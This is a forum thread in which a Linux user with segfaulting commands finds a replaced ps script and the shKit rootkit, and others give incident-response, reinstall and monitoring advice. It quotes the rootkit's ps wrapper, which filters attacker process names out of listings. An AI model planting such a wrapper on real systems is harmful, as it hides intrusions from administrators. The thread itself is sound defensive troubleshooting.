I keep on getting segmentation fault when running commands like ls, df etc...
I am not sure if i am hacked. Does anybody have any idea if this could be caused by somebody hacking me?

Thanks

Sakkie

sure, anything is possible if someone obtains root to your system, but its not likely to be the problem. Sounds like youve got some corrupt/missing lib's (maybe even a bad hd). I would first try strace'ing the process to hopefully figure out why its segfaulting. Maybe its something simple like an unmounted filesystem or something, but its impossible to diagnose knowing of only 1 of the programs that segfaulted (and not even having any details on that one).

I have found the following code in the ps file :

#!/bin/sh
#
# psX by: syg
/bin/.ps $1 $2 $3 $4 $5 $6 $7 $8 $9 > ~/.pstmp
cat ~/.pstmp|egrep -v "xntps|cround|socklist|7350f|sk|a|apach-scan.1|(swapd)|pscan2|/bin/" >> ~/.pstmp1
mv ~/.pstmp1 ~/.pstmp >> /dev/null 2>&1
cat ~/.pstmp
rm -fr ~/.pstmp > /dev/null 2>&1

I am trying to find more information but if anybody knows about the above code please help?

Thanks

I am not sure if i am hacked. Does anybody have any idea if this could be caused by somebody hacking me?
Without details this is hard to assess. Some rootkits do fsck up. What you need to do is verify your box' integrity, that is users and processes. Verify running services *are* the services you usually run (netstat -anp), verify your system auth files /etc/{passwd,shadow,group} aren't changed, then verify your system login accounting (wtmp,utmp,acct), log files (check /etc/syslog.conf if unsure which log files). Tell-tale signs could be new setuid root files in locations like /tmp or /var/tmp, dirs whose names start with a dot or "...", system binaries owned by other users, insmod errors at boot time, weird loglines in application logs. Please report anomalies you find.


I keep on getting segmentation fault when running commands like ls, df etc...
Use whatever tools your distro's package manager provides to verify the contents of the packages against a known trusted source like CD's or an FTP mirror. If you've got another box, try compiling Chkrootkit, scp it over and run. Please report anomalies you find.


sure, anything is possible if someone obtains root to your system, but its not likely to be the problem.
IMHO you should refrain from saying "not likely" unless you have a thorough understanding of the situation at hand, system compromise is too grave an issue to be nonchalant about.

As said I founded the code already mentioned in the previous posting. I also used chkrootkid and found shKit rootkit. I gues my only option is to fdisk and redo the machine.

I founded a process xntps which loads at startup.

What would be the best software to monitor any unauthorised access to my server?

Thanks

Isak

As said I founded the code already mentioned in the previous posting. I also used chkrootkid and found shKit rootkit. I gues my only option is to fdisk and redo the machine.
Yes, it is.


I founded a process xntps which loads at startup.
Could be a rogue OpenSSH binary providing a backdoor.


What would be the best software to monitor any unauthorised access to my server?
Repartition, reformat, reinstall from scratch, run your filesystem integrity scanner, harden the box. Without this any filesystem integrity scanner (Aide, Samhain, tripwire, choice depends on how many hosts you need to check, how trustworthy you want the databases to be and how comfortable you are with configuration) will be useless. Same goes for intrusion detection systems like Snort, Prelude etc.

well if ps was replaced with that code then someone has obtained root access to your machine. Your best bet is to reinstall. If you want to monitor traffic going to that machine though i would suggest doing 1 of 2 things.
1) set up a firewall machine to log all traffic to your machine.
2) put a hub between your machine and whatever your machine is connected to, then put another machine on that hub and sniff the traffic.

I was having LOTS of problems with SegV faults on my slackware system, up until about a month ago. Turns out, my system was overclocked just 20mhz too much. Windows didnt seem to mind, but since linux almost demands perfection, it had SegV faults. I've read that a few AMD processors contain a bug that can cause SegV faults. Also, if your RAM is running at a clockspeed that is too slow, it can drop a bit or two, causing SegV faults.